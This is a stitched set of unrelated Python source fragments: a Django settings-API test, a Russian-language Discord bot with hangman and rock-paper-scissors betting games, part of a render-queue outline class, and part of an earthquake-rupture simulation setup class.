resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET: 'foobar'
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_CLIENT_SECRET, to_dict=True)
assert resp.data[0]['value'] == 'foobar'
def test_auth_gitlab(self):
# enabled
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_ENABLED, to_dict=True)
assert resp.data[0]['value'] is False
resp = self.auth_client.post(self.url, data={
auth_gitlab.AUTH_GITLAB_ENABLED: True
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_ENABLED, to_dict=True)
assert resp.data[0]['value'] is True
# verification schedule
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE, to_dict=True)
assert resp.data[0]['value'] == 0
resp = self.auth_client.post(self.url, data={
auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE: 2
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_VERIFICATION_SCHEDULE, to_dict=True)
assert resp.data[0]['value'] == 2
# client id
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_gitlab.AUTH_GITLAB_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_gitlab.AUTH_GITLAB_CLIENT_ID, to_dict=True)
assert | |
element in enumerate(result):
try:
user = await self.client.fetch_user(element)
a = user.name
except (AttributeError, discord.NotFound):
a = '?'
embed.add_field(name=str(index + 1),
value=f"``{random.choice(kamo)}`` | {a} - {result[element]['money']} {emoji}",
inline=False)
await ctx.send(embed=embed)
@commands.command(name='hangman', aliases=['hg'])
async def hangman(self, ctx):
author = ctx.author
member_id = str(author.id)
word_list = ['питон',
'анаконда',
'змея',
'сова',
'мышь',
'пчела',
'шершень',
'собака',
'хорек',
'кошка',
'афалина',
'баран',
'нерпа',
'бабуин',
'аплодонтия',
'вол',
'верблюд',
'ремнезуб',
'бегемот',
'барсук',
'белка',
'гиббон',
'белуха',
'медведь',
'бизон',
'бобер',
'муравьед',
'кенгуру',
'валлаби',
'бонго',
'буйвол',
'гиена',
'бурозубка',
'бурундук',
'викунья',
'мангуст',
'волк',
'вомбат',
'выхухоль',
'газель',
'гамадрил',
'гепард',
'геренук',
'мартышка',
'песец',
'кит',
'горилла',
'зебра',
'тапир',
'гринда',
'гуанако',
'горностай',
'дельфин',
'жираф',
'дикдик',
'кабан',
'дзерен',
'осел',
'динго',
'кенгуру',
'норка',
'долгопят',
'еж',
'зубр',
'ирбис',
'тигр',
'какомицли',
'капибара',
'игрунка',
'бегемот',
'кашалот',
'коала',
'козел',
'корова',
'свинья',
'косуля',
'крыса',
'лев',
'леопард',
'гепард',
'летяга',
'лось',
'лошадь',
'конь',
'морж',
'овца',
'ондатра',
'песчанка',
'пони',
'рысь',
'лисица',
'лиса',
'антилопа',
'сайгак',
'соня',
'ленивец',
'шимпанзе',
'ягуар',
'як',
'шиншилла',
'акула',
'чайка',
'скумбрия',
'змееящерица',
'ястреб',
'варан',
'журавль',
'лев',
'тигр',
'бабочка',
'геккон',
'барсук',
'щука',
'гепард',
'волк',
'буйвол',
'бурундук',
'снегирь',
'крыса',
'альбатрос',
'черепаха',
'акула',
'жаба',
'лягушка',
'пищуха',
'кряква',
'утка',
'утконос',
'пиранья',
'пиранга',
'аист',
'уж',
'сом',
'осетр',
'соня',
'жираф',
'дрозд',
'лемминг',
'пенелопа',
'свиристель',
'свистун',
'клещ',
'медведь',
'осел',
'газель',
'хамелеон',
'дикобраз',
'ястреб',
'голубь',
'воробей',
'ворона',
'сорока',
'рысь',
'пума',
'бабуин',
'стриж',
'тюлень',
'опоссум',
'орлан',
'попугай',
'певун',
'баклан',
'удод',
'тля',
'моль',
'выдра',
'колибри',
'гну',
'бизон',
'древолаз',
'шелкопряд',
'блоха',
'вошь',
'свинья',
'кабан',
'свин',
'хомяк',
'лань',
'кролик',
'антилопа',
'леопард',
'какаду',
'конь',
'муравьед',
'вилорог',
'сельдь',
'ослик',
'ночница',
'саламандра',
'филин',
'сова',
'гадюка',
'морж',
'дятел',
'петух',
'курица',
'осьминог',
'краб',
'креветка',
'лягушка',
'бабочка',
'глухарь',
'гусь',
'кенгуру',
'аноа',
'тритон',
'карась',
'аист',
'бык',
'дзерен',
'синица',
'удав',
'бегемот',
'суслик',
'шпрот',
'енот',
'трясогузка',
'медосос',
'окунь',
'нетопырь',
'цапля',
'кукушка',
'рогоклюв',
'фазан',
'сипуха',
'зубр',
'кит',
'игуана']
guesses = 0
word = random.choice(word_list)
word_list = list(word)
blanks = ("◆" * len(word))
blanks_list = list(blanks)
unbox_blank = (' '.join(blanks_list))
new_blanks_list = list(blanks)
guess_list = []
guess_list_unbox = (', '.join(guess_list))
embed_formatter = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_formatter.set_author(name='Виселица')
hangman_picture_1 = """```
_______
|/ |
|
|
|
|
|
_|___```"""
hangman_picture_5 = """```
_______
|/ |
| (_)
| \|/
| |
|
|
_|___```"""
hangman_picture_4 = """```
_______
|/ |
| (_)
| \|/
|
|
|
_|___```"""
hangman_picture_3 = """```
_______
|/ |
| (_)
| \|
|
|
|
_|___```"""
hangman_picture_2 = """```
_______
|/ |
| (_)
|
|
|
|
_|___```"""
hangman_picture_6 = """```
_______
|/ |
| (_)
| \|/
| |
| /
|
_|___```"""
hangman_picture_7 = """```
_______
|/ |
| (_)
| \|/
| |
| / \\
|
_|___```"""
image = 'шо'
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
while guesses < 7:
embed_formatter.clear_fields()
image = (hangman_picture_1, hangman_picture_2, hangman_picture_3,
hangman_picture_4, hangman_picture_5, hangman_picture_6,
hangman_picture_7)[guesses]
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
await ctx.send(embed=embed_formatter)
russian_symbols = {'а', 'б', 'в', 'г', 'д', 'е', 'ё', 'ж', 'з', 'и', 'й', 'к', 'л', 'м', 'н', 'о', 'п', 'р',
'с', 'т', 'у', 'ф', 'х', 'ц', 'ч', 'ш', 'щ', 'ъ', 'ь', 'ы', 'э', 'ю', 'я'}
def check(author):
def inner_check(message):
content = message.content.casefold()
return message.author == author and (content in russian_symbols or content == word)
return inner_check
guess = await self.client.wait_for('message', check=check(ctx.author), timeout=120)
if len(guess.content) > 1 and guess.content != word:
await ctx.send('Хватит жульничать')
guesses -= 1
if guess.content == " ":
await ctx.send("Эй, ты не хочешь играть чтоле? Давай пиши подходящие буквы!")
if guess.content in guess_list:
await ctx.send("Ты уже использовал данный символ!")
else:
if len(guess.content) == 1:
guess.content = guess.content.casefold()
guess_list.append(guess.content)
guess_list_unbox = (', '.join(guess_list))
i = 0
while i < len(word):
if guess.content == word[i]:
new_blanks_list[i] = word_list[i]
i = i + 1
if new_blanks_list == blanks_list:
guesses = guesses + 1
if word_list != blanks_list:
blanks_list = new_blanks_list[:]
unbox_blank = (' '.join(blanks_list))
if word_list == blanks_list or guess.content.casefold() == word:
emoji = self.client.get_emoji(676803534758477845)
embed_formatter.clear_fields()
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация',
value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
await ctx.send(embed=embed_formatter)
await self.client.update_currency(member_id, 1000)
await ctx.send(f'За победу в игре "Виселица" вы получаете + **1000** {emoji} на ваш счёт!')
break
if guesses == 7:
await ctx.send(f'Вы проиграли! Правильное слово: {word}')
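The inner while-loop above that fills new_blanks_list from matching positions can be sketched as a standalone helper (``reveal`` is a hypothetical name, not part of the cog):

```python
def reveal(word, masked, letter):
    """Return a new masked list with every position of `letter` uncovered,
    leaving all other positions as they were."""
    return [ch if ch == letter else masked[i] for i, ch in enumerate(word)]
```
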
@commands.command(pass_context=True, aliases=['rockpaperscissors', 'rps', 'rcp', 'кнб', 'каменьножницыбумага'])
async def rock_paper_scissors(self, ctx, bet: int):
emoji = self.client.get_emoji(676803534758477845)
author = ctx.author
member_id = str(author.id)
self.client.currency[member_id]['money'] -= bet
if self.client.currency[member_id]['money'] >= 0:
emote = ['🗿', '📄', "✂"]
computer_choise = random.choice(emote)
embedscis = discord.Embed(
color=discord.Colour.dark_purple()
)
embedscis.add_field(name='Камень ножницы Бумага',
value=f'Скорее сделайте ваш выбор! Тет уже выбрал. {random.choice(msgend)}')
embed_draw = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_draw.add_field(name='Камень ножницы Бумага',
value=f'Тет выбрал: {computer_choise} Ничья! Сыграем ещё раз? {random.choice(msgend)}')
embed_shiro_win = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_shiro_win.add_field(name='Камень ножницы Бумага',
value=f'Тет выбрал: {computer_choise} Тет победил! {random.choice(msgend)} ')
embed_user_win = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_user_win.add_field(name='Камень ножницы Бумага',
value=f'Тет выбрал: {computer_choise} {author.mention} победил(а). {random.choice(msgend)}')
message = await ctx.send(embed=embedscis)
for e in emote:
await message.add_reaction(e)
def check(reaction, user):
return (reaction.message.id == message.id) and (user.id == ctx.author.id) and (str(reaction) in emote)
try:
reaction, user = await self.client.wait_for('reaction_add', check=check, timeout=60)
except asyncio.TimeoutError:
await ctx.send("Время вышло")
return
if str(reaction) == '🗿' and computer_choise == '🗿':
await ctx.send(embed=embed_draw)
self.client.currency[member_id]['money'] += bet
if str(reaction) == '🗿' and computer_choise == '📄':
await ctx.send(embed=embed_shiro_win)
if str(reaction) == '🗿' and computer_choise == '✂':
await ctx.send(embed=embed_user_win)
await self.client.update_currency(member_id, bet * 2)
await ctx.send(f'Вы получаете {bet * 2} {emoji}')
if str(reaction) == '📄' and computer_choise == '🗿':
await ctx.send(embed=embed_user_win)
await self.client.update_currency(member_id, bet * 2)
await ctx.send(f'Вы получаете {bet * 2} {emoji}')
if str(reaction) == '📄' and computer_choise == '📄':
await ctx.send(embed=embed_draw)
self.client.currency[member_id]['money'] += bet
if str(reaction) == '📄' and computer_choise == '✂':
await ctx.send(embed=embed_shiro_win)
if str(reaction) == '✂' and computer_choise == '🗿':
await ctx.send(embed=embed_shiro_win)
if str(reaction) == '✂' and computer_choise == '📄':
await ctx.send(embed=embed_user_win)
await self.client.update_currency(member_id, bet * 2)
await ctx.send(f'Вы получаете {bet * 2} {emoji}')
if str(reaction) == '✂' and computer_choise == '✂':
await ctx.send(embed=embed_draw)
await self.client.update_currency(member_id, bet)
else:
await ctx.send(f'Недостаточно {emoji} чтобы играть')
self.client.currency[member_id]['money'] += bet
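The chain of if-statements that decides the round result amounts to a small win table; a sketch of that dispatch (``BEATS`` and ``rps_outcome`` are illustrative names, not part of the cog):

```python
# Each key beats the value it maps to (rock smashes scissors, etc.).
BEATS = {'🗿': '✂', '✂': '📄', '📄': '🗿'}

def rps_outcome(player, computer):
    """Return 'win', 'draw' or 'lose' from the player's point of view."""
    if player == computer:
        return 'draw'
    return 'win' if BEATS[player] == computer else 'lose'
```
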
@rock_paper_scissors.error
async def moneydaily_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
embed = discord.Embed(
color=discord.Colour.dark_purple()
)
embed.add_field(name='Ошибка', value='Ваша ставка это обязательная опция!\n ```.кнб 5000```')
await ctx.send(embed=embed)
@commands.command()
async def bkeytinfo(self, ctx):
information_embed = discord.Embed(
color=discord.Colour.dark_purple()
)
information_embed.add_field(name='<NAME>',
value='Игра, которая основывается на стандартных "камень ножницы бумага", '
'но однако является его аниме-стилизованной интерпретацией. Блок схема '
'"кто-кого" бьёт прикрепляется к данному сообщению '
'\n Эмодзи и их значение: \nКирпич - 🧱, Нож - 🔪,Компромат - 📋,Яндере - '
'😈 ,Тентакли - 🐙 ')
information_embed.set_image(
url='https://cdn.discordapp.com/attachments/657178465174552616/678491112712830976/ae45770720efac14.png')
await ctx.send(embed=information_embed)
@commands.command(name='bkeyt', aliases=['кнкят'])
async def bkeyt(self, ctx, bet: int):
emoji = self.client.get_emoji(676803534758477845)
author = ctx.author
member_id = str(author.id)
await self.client.unupdate_currency(member_id, bet)
if self.client.currency[member_id]['money'] >= 0:
emote = ['🧱', '🔪', "📋", '😈', '🐙']
computer_choise = random.choice(emote)
embedscis = discord.Embed(
color=discord.Colour.dark_purple()
)
embedscis.add_field(name='<NAME>',
value=f'Скорее выбирай! Тет уже сделал свой выбор. {random.choice(msgend)}')
embed_draw = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_shiro_win = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_user_win = discord.Embed(
color=discord.Colour.dark_purple()
)
message = await ctx.send(embed=embedscis)
for e in emote:
await message.add_reaction(e)
def check(reaction, user):
return (reaction.message.id == message.id) and (user.id == ctx.author.id) and (str(reaction) in emote)
try:
reaction, user = await self.client.wait_for('reaction_add', check=check, timeout=60)
except asyncio.TimeoutError:
await ctx.send("Время закончилось")
return
# 1 - 5
if str(reaction) == '🧱' and computer_choise == '🧱':
embed_draw.add_field(name='<NAME>',
value='Кирпич на кирпич! Вау, строим дом. Ничья!')
await ctx.send(embed=embed_draw)
self.client.currency[member_id]['money'] += bet
if str(reaction) == '🧱' and computer_choise == '🔪':
embed_user_win.add_field(name='<NAME>',
value=f'Кирпич и нож. Эй, ножик может ты хотя бы попробуешь? Нет? Тогда {author.mention} побеждает!')
await ctx.send(embed=embed_user_win)
await self.client.update_currency(member_id, bet * 2)
await ctx.send(f'Вы получаете {bet * 2} {emoji}')
if str(reaction) == '🧱' and computer_choise == '📋':
embed_shiro_win.add_field(name='<NAME>',
value="Кирпич и компромат. Прямо | |
outline file is yamlized before being
# copied into the outline session. If not, the script
# is copied as is. Default is True.
self.__serialize = serialize
#
# The path to a native outline script. If a path
# is specified in the constructor, then it must
# be a path to a native (not serialized) outline
# script.
#
self.__path = None
if path:
self.__path = path
# If the name was not previously set, use the name
# of the outline file. This allows the user to override
# the auto-naming based on the outline file name if needed.
if not self.__name:
self.__name = self.__get_name_by_path()
# Now parse the outline script.
self.parse_outline_script(path)
else:
# If the user does not pass in a name or a path to an
# outline, give the outline a default name.
if not self.__name:
self.__name = "outline"
if name_unique:
self.__name = "%s_%s" % (self.__name, str(uuid.uuid4())[0:7])
def __get_name_by_path(self):
"""Return the name of the session based on the outline."""
return os.path.splitext(os.path.basename(self.__path))[0]
def parse_outline_script(self, path):
"""
Parse an outline script and add the resulting layers
to this instance.
"""
Outline.current = self
parse_outline_script(path)
def load_session(self):
"""
Reloads the session
"""
if outline.session.is_session_path(self.get_path()):
self.__session = outline.session.Session(self)
else:
msg = "failed to load outline %s, not part of a session."
raise outline.exception.OutlineException(msg % self.get_path())
def setup(self):
"""
Sets up the outline to run frames.
A new session is created for the outline and setup()
methods are run for each layer.
- Creates a new session
- Checks require arguments on all layers.
- Runs the setup() method for all layers.
- Serializes outline structure into the session.
- Sets the outline state to READY.
"""
if self.__mode >= outline.constants.OUTLINE_MODE_SETUP:
raise outline.exception.OutlineException("This outline is already setup.")
self.setup_depends()
self.__mode = outline.constants.OUTLINE_MODE_SETUP
self.__session = outline.session.Session(self)
# Run setup() for every layer assuming the frame range
# can be determined. If there is no frame range, the layer
# is not going to be launched to the cue.
for layer in self.__layers:
if layer.get_frame_range():
layer.setup()
# Remove self from the current outline.
if Outline.current == self:
Outline.current = None
if self.__serialize:
yaml_file = os.path.join(self.__session.get_path(),
"outline.yaml")
# Set a new path before serializing the outline file.
logger.info("setting new outline path: %s", yaml_file)
self.set_path(yaml_file)
# Copy the session over to a local variable and unset
# self.__session. We do not want the session to be
# archived with the outline because relaunching the
# job using the serialized outline will fail.
session = self.__session
self.__session = None
# Now copy outline file in.
logger.info("serializing outline script to session path.")
session.put_data(os.path.basename(yaml_file), self)
# Switch the session back in.
self.__session = session
elif not self.__serialize and self.get_path():
logger.info("copying outline script to session path.")
self.__session.put_file(self.get_path(), None, "script.outline")
else:
raise outline.exception.OutlineException(
"Failed to serialize outline, Procedural outlines must always use serialization.")
# Set our new mode and save.
self.set_mode(outline.constants.OUTLINE_MODE_READY)
self.__session.save()
def setup_depends(self):
"""
Iterate through layers and setup any dependencies passed in
via the "require" argument.
"""
logger.info("Setting up dependencies")
for layer in self.get_layers():
# Setup dependencies passed in via the layer's require argument.
if layer.get_arg("require", False):
if not isinstance(layer.get_arg("require"), (tuple, list, set)):
require, dtype = outline.depend.parse_require_str(layer.get_arg("require"))
try:
layer.depend_on(self.get_layer(require), dtype)
except outline.exception.OutlineException:
logger.warning("Invalid layer in depend %s, skipping", require)
continue
else:
# Process the require argument.
for require in layer.get_arg("require"):
require, dtype = outline.depend.parse_require_str(require)
try:
layer.depend_on(self.get_layer(str(require)), dtype)
except outline.exception.OutlineException:
logger.warning("Invalid layer in depend %s, skipping", require)
continue
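setup_depends() accepts require entries either as a single string or an iterable of strings. A minimal sketch of that normalization, where ``parse_require`` is a hypothetical stand-in for ``outline.depend.parse_require_str`` and the ``'layer_name:depend_type'`` format with an ``'all'`` default is an assumption:

```python
def parse_require(require_str, default_type='all'):
    """Split a 'layer_name:depend_type' string; the suffix is optional."""
    name, _, dtype = require_str.partition(':')
    return name, dtype or default_type

def normalize_requires(require):
    """Accept either a single require string or an iterable of them,
    returning a list of (layer_name, depend_type) pairs."""
    if not isinstance(require, (tuple, list, set)):
        require = [require]
    return [parse_require(str(r)) for r in require]
```
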
def add_layer(self, layer):
"""Adds a new layer."""
if not layer.get_arg("register"):
return
if layer in self.__layers:
logger.info("The layer %s was already added to this outline.", layer.get_name())
return
if self.is_layer(layer.get_name()):
raise outline.exception.OutlineException(
"The layer %s already exists" % layer.get_name())
self.__layers.append(layer)
layer.set_outline(self)
layer.after_init(self)
try:
if getattr(layer, "get_children"):
for child in layer.get_children():
child.set_outline(self)
child.after_init(self)
except AttributeError:
pass
# If we're in setup mode, run setup ASAP
if self.__mode == outline.constants.OUTLINE_MODE_SETUP:
layer.setup()
logger.info("adding layer: %s", layer.get_name())
def remove_layer(self, layer):
"""Remove an existing layer."""
if self.__mode >= outline.constants.OUTLINE_MODE_SETUP:
msg = "Cannot remove layers from an outline that is not in init mode."
raise outline.exception.OutlineException(msg)
if layer in self.__layers:
self.__layers.remove(layer)
def get_layer(self, name):
"""Return a layer by name."""
layer_map = {evt.get_name(): evt for evt in self.__layers}
try:
return layer_map[name]
except Exception as e:
raise outline.exception.OutlineException("invalid layer name: %s, %s" % (name, e))
def get_layers(self):
"""Return the outline's layers.
Modifying the result of this method will not alter the actual
layer list. To add a new layer, use add_layer.
"""
return list(self.__layers)
def is_layer(self, name):
"""Return true if a layer exists with the specified name."""
layer_map = {evt.get_name(): evt for evt in self.__layers}
return name in layer_map
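get_layer() and is_layer() each rebuild the same name-to-layer dict inline; the shared piece can be factored out as below (``build_layer_map`` is a sketch, not the library's API):

```python
def build_layer_map(layers):
    """Map layer names to layer objects, as get_layer()/is_layer() do inline."""
    return {layer.get_name(): layer for layer in layers}
```
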
def get_path(self):
"""Return the path to the outline file."""
return self.__path
def set_path(self, path):
"""Set the path to the outline file."""
self.__path = path
def set_name(self, name):
"""Set the name of this outline.
The name is usually based on the name of the outline
script but it's possible to set it manually. Do not
include the show-shot-user prefix when setting the
name.
Once the outline is setup to launch, changing
the name has no effect.
"""
self.__name = name
def get_name(self):
"""Return the name of the outline."""
return self.__name
def get_full_name(self):
"""
Return the full name of the Outline instance, which
includes the show, shot, user, and file name.
"""
if self.__session:
return self.get_session().get_name().split("/")[0]
return "%s-%s-%s_%s" % (self.get_show(),
self.get_shot(),
self.get_user(),
self.get_name())
def get_shot(self):
"""Return the shot for this outline."""
if self.__shot is None:
return outline.util.get_shot()
return self.__shot
def set_shot(self, shot):
"""Set the shot name for this outline instance.
:type shot: string
:param shot: The name of shot to set.
"""
self.__shot = shot
def get_show(self):
"""Return the show for this outline."""
if self.__show is None:
return outline.util.get_show()
return self.__show
def set_show(self, show):
"""Set the show name for this outline instance.
:type show: string
:param show: The name of show to set.
"""
self.__show = show
def get_user(self):
"""Return the user for this outline."""
if self.__user is None:
return outline.util.get_user()
return self.__user
def set_user(self, user):
"""Set the user name for this outline instance.
:type user: string
:param user: The name of user to set.
"""
self.__user = user
def get_facility(self):
"""Return the launch facility for this outline."""
return self.__facility
def set_facility(self, facility):
"""Set the launch facility for this outline instance.
:type facility: string
:param facility: The name of the facility to set.
"""
self.__facility = facility
def get_maxcores(self):
"""Return the maximum number of CPU cores for this outline."""
return self.__maxcores
def set_maxcores(self, maxcores):
"""Set the maximum number of CPU cores for this outline instance.
:type maxcores: int
:param maxcores: The maximum number of CPU cores to set.
"""
self.__maxcores = maxcores
def get_maxgpus(self):
"""Return the maximum number of GPU units for this outline."""
return self.__maxgpus
def set_maxgpus(self, maxgpus):
"""Set the maximum number of GPU units for this outline instance.
:type maxgpus: int
:param maxgpus: The maximum number of GPU units to set.
"""
self.__maxgpus = maxgpus
def get_mode(self):
"""Return the current mode of this outline object.
See outline.constants for a list of possible modes. The mode
cannot be set from outside of the module.
"""
return self.__mode
def set_mode(self, mode):
"""Set the current mode of the outline."""
if mode < self.__mode:
raise outline.exception.OutlineException("You cannot go back to previous modes.")
self.__mode = mode
def get_session(self):
"""
Return the session object. An OutlineException is raised if the
session has not been setup.
:rtype: outline.session.Session
:return: The outline's session object.
"""
if not self.__session:
raise outline.exception.SessionException("A session has not been created yet.")
return self.__session
def set_frame_range(self, frame_range):
"""Set the outline's frame set. The frame set must be
assigned before the outline can go into the setup phase.
:type frame_range: str or list or set or tuple or FileSequence.FrameSet
:param frame_range: The frame range for this outline.
"""
if isinstance(frame_range, FileSequence.FrameSet):
self.__frame_range = str(frame_range)
elif isinstance(frame_range, (list, set, tuple)):
self.__frame_range = ",".join([str(frame) for
frame in frame_range])
else:
self.__frame_range | |
properties array (numpy array with shape ``(3, nx, ny, nz)``)
:type mat: ndarray
:returns: None
"""
if self.ndim == 3:
assert (mat.shape[1:] == self.nx), "heterogeneous material properties shape must match grid sizes"
else:
assert (mat.shape[1:] == self.nx[0:2]), "heterogeneous material properties shape must match grid sizes"
self.f.set_het_material(mat)
def get_plastic_tensor(self):
"""
Returns boolean indicating if simulation will compute full plastic strain tensor
:returns: Whether or not simulation will compute the full plastic strain tensor
:rtype: bool
"""
return self.f.get_plastic_tensor()
def set_plastic_tensor(self, plastic_tensor):
"""
Sets value of plastic strain tensor indicator
Method sets whether or not plastic strain will be computed as a tensor (must be boolean).
``True`` means the full tensor will be calculated, ``False`` means it will not (which saves substantial memory)
:param plastic_tensor: New value of plastic strain tensor variable (must be boolean)
:type plastic_tensor: bool
:returns: None
"""
self.f.set_plastic_tensor(plastic_tensor)
def get_nifaces(self):
"""
Returns number of interfaces
:returns: Number of interfaces
:rtype: int
"""
return self.nifaces
def get_iftype(self, index = None):
"""
Returns interface type of given index, if none provided returns full list
:param index: (optional) index of desired interface (zero-indexed). If not given or if ``None``
is given the entire list of interface types is returned
:type index: int
:returns: str or list
"""
if index is None:
return self.iftype
else:
assert index >= 0 and index < self.nifaces, "Index out of range"
return self.iftype[index]
def set_iftype(self, index, iftype):
"""
Sets type of interface with a given index
Changes type of a particular interface. ``index`` is the index of the interface to be
modified and ``iftype`` is a string denoting the interface type. Valid values for
``iftype`` are ``'locked'``, ``'frictionless'``, ``'slipweak'``, and ``'stz'``. Any other values
will result in an error, as will an interface index that is out of bounds.
:param index: Index (nonnegative integer) of interface to be modified
:type index: int
:param iftype: New interface type (see valid values above)
:type iftype: str
:returns: None
"""
assert index >=0 and index < self.nifaces, "Index not in range"
assert iftype in ("locked", "frictionless", "slipweak", "stz"), "Interface type must be 'locked', 'frictionless', 'slipweak', or 'stz'"
if iftype == self.interfaces[index].get_type():
return
self.iftype[index] = iftype
direction = self.interfaces[index].get_direction()
bm = self.interfaces[index].get_bm()
bp = self.interfaces[index].get_bp()
if iftype == "locked":
self.interfaces[index] = interface(self.ndim, index, direction, bm, bp)
elif iftype == "frictionless":
self.interfaces[index] = friction(self.ndim, index, direction, bm, bp)
elif iftype == "slipweak":
self.interfaces[index] = slipweak(self.ndim, index,direction,bm,bp)
else:
self.interfaces[index] = stz(self.ndim, index,direction,bm,bp)
def get_nloads(self, index):
"""
Returns number of loads on interface with given index
:param index: index of desired interface (zero-indexed)
:type index: int
:returns: int
"""
assert type(index) is int and index >= 0 and index < self.nifaces, "Must give integer index for interface"
return self.interfaces[index].get_nloads()
def add_load(self, newload, index = None):
"""
Adds load to interface
Add a load perturbation to the interface with the given index. If no index is provided,
the load will be added to all interfaces. If the index is an integer, the load will be added
to the interface with that index. Finally, the index can be an iterable (list or tuple) of
integers, and the load will be added to all interfaces in the iterable. Indices that are
out of bounds or indicate an interface that is not frictional will raise an error.
Default value is ``None`` (all interfaces).
``newload`` must be a load perturbation (i.e. have type ``load``), or the code will raise an
error. ``newload`` will be appended to the load list
:param newload: Load to be added
:type newload: ~fdfault.load
:param index: Interface to which the load should be added. Can be a single integer,
iterable of integers, or ``None`` to add to all interfaces (default is ``None``)
:type index: int or tuple or list or None
:returns: None
"""
if index is None:
for iface in self.interfaces:
try:
iface.add_load(newload)
except NotImplementedError:
print("skipping non-frictional interface")
else:
try:
for i in index:
assert type(i) is int and i >= 0 and i < self.nifaces, "Must give integer index for interface"
self.interfaces[i].add_load(newload)
except TypeError:
assert type(index) is int and index >= 0 and index < self.nifaces, "Must give integer index for interface"
self.interfaces[index].add_load(newload)
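The ``None``/int/iterable dispatch used by ``add_load`` (and ``add_pert``) can be sketched in isolation; ``apply_to`` and the ``loads`` list below are hypothetical stand-ins, not part of this module:

```python
def apply_to(items, action, index=None):
    # None -> every item; int -> one item; iterable -> each listed item
    if index is None:
        targets = range(len(items))
    elif isinstance(index, int):
        targets = [index]
    else:
        targets = index
    for i in targets:
        assert isinstance(i, int) and 0 <= i < len(items), "Must give integer index"
        action(items[i])

loads = [[], [], []]
apply_to(loads, lambda lst: lst.append("load"), index=(0, 2))
# loads is now [['load'], [], ['load']]
```

Catching only ``TypeError`` around the ``for i in index`` loop (rather than a bare ``except``) keeps a failed bounds assertion inside the loop from being silently swallowed.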
def delete_load(self, niface, index = -1):
"""
Deletes the load at position ``index`` from the load list of interface ``niface``
Deletes loads from a frictional interface. ``niface`` is an index referring to the desired
interface. Out of bounds values or interfaces that are not frictional will result in an error.
``index`` indicates the position in the load list that should be deleted.
Default for ``index`` is ``-1`` (most recently added).
:param niface: Interface from which the load should be removed. ``niface`` must refer to
a frictional interface
:type niface: int
:param index: Index within the load perturbation that should be removed (default is last)
:type index: int
:returns: None
"""
assert type(niface) is int and niface >= 0 and niface < self.nifaces, "Must give integer index for interface"
self.interfaces[niface].delete_load(index)
def get_load(self, niface, index = None):
"""
Returns load for index niface at position index. If no index provided, returns entire list of loads
:param niface: index of desired interface (zero-indexed)
:type niface: int
:param index: (optional) index of perturbation. If not provided or None, then returns entire list
:type index: int
:returns: load or list
"""
assert type(niface) is int and niface >= 0 and niface < self.nifaces, "Must give integer index for interface"
return self.interfaces[niface].get_load(index)
def get_nperts(self, index):
"""
Returns number of perturbations (integer) on given interface with given index
:param index: index of desired interface (zero-indexed)
:type index: int
:returns: int
"""
assert type(index) is int and index >= 0 and index < self.nifaces, "Must give integer index for interface"
return self.interfaces[index].get_nperts()
def add_pert(self, newpert, index = None):
"""
Add new friction parameter perturbation to an interface
Method adds a frictional parameter perturbation to an interface. ``newpert`` must
be a parameter perturbation of the correct kind for the given interface type (i.e. if
the interface is of type ``slipweak``, then ``newpert`` must have type ``swparam``).
``index`` indicates the index of the interface to which the perturbation will be added.
``index`` can be a single integer index, an iterable containing multiple indices, or
``None`` to add to all interfaces (default behavior is ``None``). Out of bounds values
will raise an error.
:param newpert: New perturbation to be added. Must have a type that matches
the interface(s) in question.
:type newpert: pert (more precisely, one of the derived classes of friction parameter perturbations)
:param index: Index of interface to which the perturbation will be added (single index or
iterable of indices, or ``None`` for all interfaces, optional)
:type index: int or list or tuple or None
:returns: None
"""
if index is None:
for iface in self.interfaces:
try:
iface.add_pert(newpert)
except NotImplementedError:
print("skipping non-frictional interface")
else:
try:
for i in index:
assert type(i) is int and i >= 0 and i < self.nifaces, "Must give integer index for interface"
self.interfaces[i].add_pert(newpert)
except TypeError:
